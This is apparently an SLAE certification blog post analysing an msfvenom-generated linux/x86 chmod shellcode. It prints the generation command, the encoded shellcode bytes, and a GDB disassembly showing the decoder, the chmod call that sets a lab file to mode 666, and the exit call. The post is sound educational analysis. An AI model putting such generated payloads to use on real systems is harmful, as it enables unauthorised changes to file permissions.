- Take up at least 3 shellcode samples created using msfvenom for linux/x86
- Use GDB/Ndisasm/Libemu to dissect the functionality of the shellcode
- Present your analysis
Command to generate shellcode:
msfvenom -p linux/x86/chmod FILE=/home/ptlabmachine/slae-test.txt -b '\x00' -f c
"\xdb\xd5\xba\xa6\x9c\x1b\xf7\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1" "\x0f\x31\x56\x18\x03\x56\x18\x83\xc6\xa2\x7e\xee\x6e\xc0\x71" "\x49\xc3\xfc\xaf\x69\xe3\xfc\x80\x01\x8c\x91\xbb\xfe\x22\x1d" "\x28\x60\xa1\xb0\xd1\x01\x4d\x23\x7c\xa3\xa2\xc0\xec\x4a\xd8" "\x0b\x99\xe9\x51\x27\x4f\x86\xed\xb3\x8f\x3d\x66\x8d\x91\xc1" "\x76\xa8\x5c\x41\x1c\x4b\x07\x8f\x61"
File permission before exectuing the shellcode:
Testing shellcode with run_shellcode.c
Chmod system call details:
The chmod system call takes in two arguments, path to the file and mode. It is represented by syscall number 15.
Let’s analyze the shellcode with gdb:
Placed a breakpoint at code variable, defined hook-stop and issued run command:
We have hit our breakpoint and this is the state of CPU registers:
Examining the contents at memory loaction 0x0804a040 (i.e. where EIP is pointing to at present):
We are at the begining of our shellcode. We step into the code few times to let the decoder work:
We have entered a loop. Placing the breakpoint at 0x0804a05b (the next instruction after loop) and continuing the execution of the program:
Disassembling 60 bytes from eip. This is our decoded shellcode:
0x0804a05c <code+28>: push 0xf 0x0804a05e <code+30>: pop eax
Store the syscall number 15 (hex 0xf) in eax.
0x0804a05f <code+31>: push edx 0x0804a060 <code+32>: call 0x804a086 <code+70> 0x0804a065 <code+37>: das 0x0804a066 <code+38>: push 0x2f656d6f 0x0804a06b <code+43>: jo 0x804a0e1 0x0804a06d <code+45>: ins BYTE PTR es:[edi],dx 0x0804a06e <code+46>: popa 0x0804a06f <code+47>: bound ebp,QWORD PTR [ebp+0x61] 0x0804a072 <code+50>: arpl WORD PTR [eax+0x69],bp 0x0804a075 <code+53>: outs dx,BYTE PTR ds:[esi] 0x0804a076 <code+54>: gs 0x0804a077 <code+55>: das 0x0804a078 <code+56>: jae 0x804a0e6 0x0804a07a <code+58>: popa 0x0804a07b <code+59>: gs 0x0804a07c <code+60>: sub eax,0x74736574 0x0804a081 <code+65>: cs 0x0804a082 <code+66>: je 0x804a0fc 0x0804a084 <code+68>: je 0x804a086 <code+70> 0x0804a086 <code+70>: pop ebx
Store the file path /home/ptlabmachine/slae-test.txt on stack and pop the address in ebx. Examining the memory address 0x0804a065:
As can be seen from the above image, instructions from 0x0804a06 to 0x0804a084 are hex values for the string ‘/home/ptlabmachine/slae-test.txt’. These hex values have been translated by gdb as instructions.
0x0804a087 <code+71>: push 0x1b6 0x0804a08c <code+76>: pop ecx 0x0804a08d <code+77>: int 0x80
These instructions store the mode 0x1bx (666 in oct) on stack and pop it into ecx. Finally, the chmod syscall is executed using the interrupt instruction.
0x0804a08f <code+79>: push 0x1 0x0804a091 <code+81>: pop eax 0x0804a092 <code+82>: int 0x80
These instructions execute the exit syscall.
The libemu graph for this shellcode is:
Github repository for this assignment: Assignment 5/5-1
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: SLAE-897
Uday Mittal (OSCP, Associate CISSP, DCPP) is the founder of Yaksas CSC. He has over 4 years of experience in dealing with various issues related to cyber security. He is actively working towards educating people on cyber security risks and steps to mitigate them. He’s also a member of (ISC)2, ISACA and DSCI.